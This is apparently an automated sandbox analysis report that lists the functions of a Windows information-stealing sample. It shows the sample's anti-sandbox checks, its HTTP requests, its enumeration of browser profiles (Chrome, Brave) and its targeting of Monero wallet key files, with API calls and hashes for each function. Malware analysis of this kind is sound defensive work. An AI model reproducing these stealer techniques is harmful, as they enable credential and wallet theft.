                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 23d53686c421a099530d7605b2400d9eaad1fe3cef2b0cf4c4578b4596ff5d9a
                  • Instruction ID: b6b62bcc899827b610d373a46db5e5e54431e5814be17349b3397882e9da346a
                  • Opcode Fuzzy Hash: 23d53686c421a099530d7605b2400d9eaad1fe3cef2b0cf4c4578b4596ff5d9a
                  • Instruction Fuzzy Hash: 6F31EA71904218AADB04FBF0DC56BFEB778AF94740F104528F252B61D2DFB46A05CEA6
                  Function 00921220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 921220-921247 call 9389b0 GlobalMemoryStatusEx 1439 921273-92127a 1436->1439 1440 921249-921271 call 93da00 * 2 1436->1440 1442 921281-921285 1439->1442 1440->1442 1443 921287 1442->1443 1444 92129a-92129d 1442->1444 1446 921292-921294 ExitProcess 1443->1446 1447 921289-921290 1443->1447 1447->1444 1447->1446
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0092123E
                  • __aulldiv.LIBCMT ref: 00921258
                  • __aulldiv.LIBCMT ref: 00921266
                  • ExitProcess.KERNEL32 ref: 00921294
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 2d48f73a616f3938f3ef741aaae2483ff9c7d969e1c900d047eea4ea5b767058
                  • Instruction ID: fb94158911af60d249a33222a9458c5277eab56b3bdf02719890630fcd7e796a
                  • Opcode Fuzzy Hash: 2d48f73a616f3938f3ef741aaae2483ff9c7d969e1c900d047eea4ea5b767058
                  • Instruction Fuzzy Hash: 65016DB0D44308FBEF10DBE0EC49BAEBB78AB54701F208048F705B62C4DBB855518B99
                  Function 00936AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 936af3 1451 936b0a 1450->1451 1453 936aba-936ad7 call 93aad0 OpenEventA 1451->1453 1454 936b0c-936b22 call 936920 call 935b10 CloseHandle ExitProcess 1451->1454 1460 936af5-936b04 CloseHandle Sleep 1453->1460 1461 936ad9-936af1 call 93aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00936AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00936AF9
                  • Sleep.KERNEL32(00001770), ref: 00936B04
                  • CloseHandle.KERNEL32(?,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936B1A
                  • ExitProcess.KERNEL32 ref: 00936B22
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 6ad6ba146417ef1a82b4017f0b72f668193b5d26f2160cd91efb88704dc55b98
                  • Instruction ID: 3e4d4b5a08a8701ed34ffe7308417933103ebcf4a75ff3e387d4aad05d562b63
                  • Opcode Fuzzy Hash: 6ad6ba146417ef1a82b4017f0b72f668193b5d26f2160cd91efb88704dc55b98
                  • Instruction Fuzzy Hash: 35F03A30944209BAEB00ABA0DC16BBDBA74EB44701F108914F503E61C1CBF45940DE56
                  Function 009247B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: fe9153437144bae6157982e279cc2853901b16c9562f9217eae8f8856e9f83a3
                  • Instruction ID: 1dd9e5688ae9b2bcf4b80db3d188437ea6ee05673642509a33ef269169053f36
                  • Opcode Fuzzy Hash: fe9153437144bae6157982e279cc2853901b16c9562f9217eae8f8856e9f83a3
                  • Instruction Fuzzy Hash: 78215EB1D01209ABDF10DFA4E855BDE7B79FB45320F008625F955AB2C0EB706A09CF91
                  Function 009351F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 00926280: InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
                    • Part of subcall function 00926280: StrCmpCA.SHLWAPI(?,0105E790), ref: 00926303
                    • Part of subcall function 00926280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
                    • Part of subcall function 00926280: HttpOpenRequestA.WININET(00000000,GET,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00926385
                    • Part of subcall function 00926280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
                    • Part of subcall function 00926280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935228
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 6444a29d127700d06ee15015929f3a4b9c1018b2b2ae58fdfcad15332cfe58e7
                  • Instruction ID: b6949e24f61cb7ddd7e12444cef3b64a59d3c97198afd726b15b8f25461b8c54
                  • Opcode Fuzzy Hash: 6444a29d127700d06ee15015929f3a4b9c1018b2b2ae58fdfcad15332cfe58e7
                  • Instruction Fuzzy Hash: C7110C31910148ABCB14FF64DD92FED7378AF90300F804558F95A5B592EF34AB06CE92
                  Function 00921110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0092112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00921132
                  • ExitProcess.KERNEL32 ref: 00921143
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: a4f673ccab7396b8d9afa148c50024c5e84fdf98005584cf7980fb6ced6e43d9
                  • Instruction ID: 7ab0dfb2bf2fd12ef19502ed5a070f6baa9eb7a7c611b63f9c4794c912cce1f3
                  • Opcode Fuzzy Hash: a4f673ccab7396b8d9afa148c50024c5e84fdf98005584cf7980fb6ced6e43d9
                  • Instruction Fuzzy Hash: ABE0E670985308FBEB106BA0AC0AB197678AB04B01F104154F709771D5DAF92A509A99
                  Function 009210A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009210B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009210F7
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 7bb5ea39fac9841338571596f1e2ebf5423e401d4eba31f9e6855556ddd91aca
                  • Instruction ID: 2305d3bb32cc39764018fde19265fa43d29b56821256c0f521c884dc6257fdc8
                  • Opcode Fuzzy Hash: 7bb5ea39fac9841338571596f1e2ebf5423e401d4eba31f9e6855556ddd91aca
                  • Instruction Fuzzy Hash: 33F0E271681318BBEB149AA4AC59FBBB7ECE705B15F301848F504E3280D972AE00CAA0
                  Function 00921190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
                    • Part of subcall function 009378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00937917
                    • Part of subcall function 009378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F
                    • Part of subcall function 00937850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
                    • Part of subcall function 00937850: RtlAllocateHeap.NTDLL(00000000), ref: 00937887
                    • Part of subcall function 00937850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F
                  • ExitProcess.KERNEL32 ref: 009211C6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: b415cdfc92e17db00bedcc8899f6d90c581e57cc0a06de9292630c9b53b72875
                  • Instruction ID: 1d8f83bd390acee0f21894f8fd31844a64ee707968b09b0f40de293fd252e24d
                  • Opcode Fuzzy Hash: b415cdfc92e17db00bedcc8899f6d90c581e57cc0a06de9292630c9b53b72875
                  • Instruction Fuzzy Hash: 80E012B591430953CE1073F4BC4BB2B369C5B64345F040425FA09E3153FEA9F8208D66

                  Non-executed Functions

                  Function 009338B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 009338CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 009338E3
                  • lstrcat.KERNEL32(?,?), ref: 00933935
                  • StrCmpCA.SHLWAPI(?,00940F70), ref: 00933947
                  • StrCmpCA.SHLWAPI(?,00940F74), ref: 0093395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00933C67
                  • FindClose.KERNEL32(000000FF), ref: 00933C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 77c64638ad123684aedec5e94c4137ad0afa85e23bec3ac5d2b65c8ef7768b74
                  • Instruction ID: 2668918b4789cbd1045a465e0e54749fd994adb1a62bc797954c4b8a4219a7b7
                  • Opcode Fuzzy Hash: 77c64638ad123684aedec5e94c4137ad0afa85e23bec3ac5d2b65c8ef7768b74
                  • Instruction Fuzzy Hash: F3A100B19402189BDB24DFA4DC85FEE7379BB98300F048598F64DA7181EB759B84CF62
                  Function 0092BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00940B32,00940B2B,00000000,?,?,?,009413F4,00940B2A), ref: 0092BEF5
                  • StrCmpCA.SHLWAPI(?,009413F8), ref: 0092BF4D
                  • StrCmpCA.SHLWAPI(?,009413FC), ref: 0092BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0092C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 4a2d14dc177e489e663bf0e60e9bcd7b11757f2bcc1942138aa1ac40dfcef1ca
                  • Instruction ID: 27818e2c37988327f8f63d7209d9189f50ca00e9a0d2b484120c5a12cfb56456
                  • Opcode Fuzzy Hash: 4a2d14dc177e489e663bf0e60e9bcd7b11757f2bcc1942138aa1ac40dfcef1ca
                  • Instruction Fuzzy Hash: 78424D72900108ABCB14FB60DD96FEE737DABD4300F404558F94AA7195EE34AB49CFA2
                  Function 00934910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0093492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00934943
                  • StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
                  • StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
                  • FindClose.KERNEL32(000000FF), ref: 00934B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
